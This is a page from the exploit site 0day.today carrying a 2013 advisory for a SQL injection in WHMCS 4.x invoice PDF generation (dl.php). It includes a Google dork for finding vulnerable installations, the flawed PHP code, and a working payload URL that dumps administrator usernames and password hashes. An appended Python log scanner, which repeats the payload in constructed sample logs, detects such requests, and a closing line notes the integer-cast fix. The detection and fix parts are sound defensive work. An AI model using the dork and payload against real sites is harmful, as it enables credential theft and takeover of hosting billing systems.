0day.today - Biggest Exploit Database in the World.
WHMCS 4.x SQL Injection Vulnerability
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and prior versions should be affected too
# Tested on: Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SQL Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- Vulnerable Code Snippet :

LINE 582: function pdfInvoice($id)
LINE 583: {

LINE 686:     if ($CONFIG['GroupSimilarLineItems'])
LINE 687:     {
LINE 688:         $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689:     }

As we can see here, the $id argument of the pdfInvoice function is used directly in the MySQL query without any sanitization, which leads directly to SQL injection.

It appears that the pdfInvoice function is called from the "/dl.php" file as follows:

LINE 21: if ($type == 'i')
LINE 22: {
LINE 23:     $result = select_query('tblinvoices', '', array(
LINE 24:         'id' => $id
LINE 25:     ));
LINE 26:     $data = mysql_fetch_array($result);
LINE 27:     $invoiceid = $data['id'];
LINE 28:     $invoicenum = $data['invoicenum'];
LINE 29:     $userid = $data['userid'];
LINE 30:     if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31:     {
LINE 32:         downloadLogin();
LINE 33:     }
LINE 34:     if (!$invoicenum)
LINE 35:     {
LINE 36:         $invoicenum = $invoiceid;
LINE 37:     }
LINE 38:     require('includes/clientfunctions.php');
LINE 39:     require('includes/countries.php');
LINE 40:     require('includes/invoicefunctions.php');
LINE 41:     require('includes/tcpdf.php');
LINE 42:     $pdfdata = pdfInvoice($id);
LINE 43:     header('Pragma: public');
LINE 44:     header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45:     header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46:     header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47:     header('Cache-Control: private', false);
LINE 48:     header('Content-Type: application/octet-stream');
LINE 49:     header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50:     header('Content-Transfer-Encoding: binary');
LINE 51:     echo $pdfdata;
LINE 52:     exit();
LINE 53:     return 1;
LINE 54: }

As we can see at LINE "42", the pdfInvoice function is called with the $id variable passed in without any sanitization. Afterwards it forces the browser to download the generated invoice in PDF format.

- Proof of Concept for Exploitation

To dump administrator credentials (user & pass):

http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- ~

Result: the browser will prompt to download the PDF invoice file; after opening it you should find the username and password hash there :)

- Precondition to Successfully Exploit the Vulnerability:

The "Group Similar Line Items" option should be enabled in the Invoices settings of the WHMCS admin (it is enabled by default).

- Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

# 0day.today [2024-12-25] #
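Because dl.php only ever needs a numeric invoice id, a defender can spot attempts against this bug in web-server access logs by flagging any dl.php request whose id parameter is not a plain integer. The following log scanner is an added example, not part of the advisory or of WHMCS; the log lines it scans are constructed samples in common log format, and the function and field names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not taken from real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [14/May/2013:10:01:02 +0000] "GET /whmcs/dl.php?type=i&id=1 HTTP/1.1" 200 5120
203.0.113.10 - - [14/May/2013:10:01:09 +0000] "GET /whmcs/dl.php?type=i&id=1%20and%200x0=0x1%20union%20select%201,2,3,4,CONCAT(username,0x3a3a3a,password),6,7%20from%20tbladmins%20--%20~ HTTP/1.1" 200 5120
203.0.113.11 - - [14/May/2013:10:02:00 +0000] "GET /whmcs/dl.php?type=q&id=77 HTTP/1.1" 200 4096
203.0.113.12 - - [14/May/2013:10:03:00 +0000] "GET /whmcs/dl.php?type=i&id=12abc HTTP/1.1" 200 5120
203.0.113.13 - - [14/May/2013:10:04:00 +0000] "GET /whmcs/index.php?id=1%20or%201=1 HTTP/1.1" 200 1024
"""

# Client address and the quoted request line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'\d+')


def is_suspicious_id(value: str) -> bool:
    """A legitimate invoice id is digits only; anything else is injection-shaped."""
    return INT_RE.fullmatch(value.strip()) is None


def scan_log(text: str) -> list[dict]:
    """Return one finding per dl.php request whose id parameter is not a plain integer."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/dl.php"):
            continue  # only the invoice download handler is in scope here
        # parse_qs percent-decodes and splits each pair on its first '=' only,
        # so an injected "0x0=0x1" stays inside the id value.
        params = parse_qs(url.query, keep_blank_values=True)
        for raw_id in params.get("id", []):
            if is_suspicious_id(raw_id):
                findings.append({
                    "line": lineno,
                    "client": m.group("client"),
                    "type": params.get("type", [""])[0],
                    "id": raw_id,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} type={f['type']!r} id={f['id']!r}")
```

The same check, applied server-side (casting $id to an integer or binding it as a prepared-statement parameter before it reaches the query), is what closes the hole in the first place.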